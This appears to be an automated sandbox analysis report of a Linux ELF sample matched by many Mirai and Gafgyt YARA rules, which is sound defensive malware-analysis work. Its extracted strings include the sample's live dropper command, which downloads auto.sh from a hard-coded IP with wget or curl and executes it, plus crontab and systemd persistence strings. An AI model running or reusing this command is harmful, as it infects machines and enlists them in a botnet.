Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: Initial sampleString containing 'busybox' found: busybox
Source: Initial sampleString containing 'busybox' found: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: Initial sampleString containing 'busybox' found: G%s/%s/proc//proc/%s/cmdlinewgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe/mnt/root/dev/null/dev/console/var/wwwsystemctl daemon-reload/tmp/current_crontabcrontab %s/tmp/crontabXXXXXX@reboot %s
Source: Initial sampleString containing 'busybox' found: systemctl enable startup_command.servicecrontab -l > /tmp/current_crontab 2>/dev/nullcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/i586.elf (PID: 6266)SIGKILL sent: pid: 721, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6266)SIGKILL sent: pid: 904, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6266)SIGKILL sent: pid: 912, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6266)SIGKILL sent: pid: 918, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6266)SIGKILL sent: pid: 936, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6266)SIGKILL sent: pid: 1601, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6266)SIGKILL sent: pid: 1638, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6266)SIGKILL sent: pid: 1877, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6266)SIGKILL sent: pid: 6295, result: successfulJump to behavior
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6452.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6451.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6441.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6263.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
